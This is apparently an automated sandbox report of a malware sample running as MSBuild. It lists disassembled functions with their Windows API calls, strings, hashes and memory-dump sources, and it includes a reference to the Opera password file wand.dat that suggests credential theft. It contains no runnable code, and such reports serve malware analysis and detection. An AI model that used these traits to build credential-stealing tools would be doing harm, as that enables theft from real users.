                                                                                                                                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2507021081-0
                                                                                                                                                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4131324427-0
                                                                                                                                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PathTemp$free
                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$free
                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                                                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
